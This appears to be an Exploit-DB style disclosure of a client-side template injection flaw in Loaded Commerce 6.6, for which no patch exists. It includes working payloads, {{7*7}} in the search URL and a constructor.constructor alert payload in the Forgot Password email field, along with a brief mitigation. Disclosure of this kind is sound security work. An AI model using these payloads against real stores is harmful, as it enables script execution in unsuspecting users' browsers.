Loaded Commerce 6.6 Client-Side Template Injection(CSTI)

vendor:

Loaded Commerce

by:

tmrswrr

6.1

CVSS

HIGH

Client-Side Template Injection (CSTI)

CWE

Product Name: Loaded Commerce

Affected Version From: 6.6

Affected Version To: 6.6

Patch Exists: NO

Related CWE:

CPE: a:loadedcommerce:loaded_commerce:6.6

Metasploit:

Other Scripts:

Platforms Tested: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce

2025

Loaded Commerce 6.6 Client-Side Template Injection(CSTI)

The exploit involves injecting {{7*7}} in the search parameter of Loaded Commerce 6.6, resulting in a template injection vulnerability. Similarly, submitting {{constructor.constructor('alert(1)')()}} in the email field on the 'Forgot Password' page triggers client-side code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs to prevent malicious code injection.

Source

Exploit-DB raw data:

# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI) 
# Date: 03/13/2025
# Exploit Author: tmrswrr
# Vendor Homepage: https://loadedcommerce.com/
# Version: 6.6
# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce

Injecting {{7*7}} into the search parameter 
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
returns 49, confirming a template injection vulnerability.

Forgot Password:
Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
triggers an alert, demonstrating client-side code execution.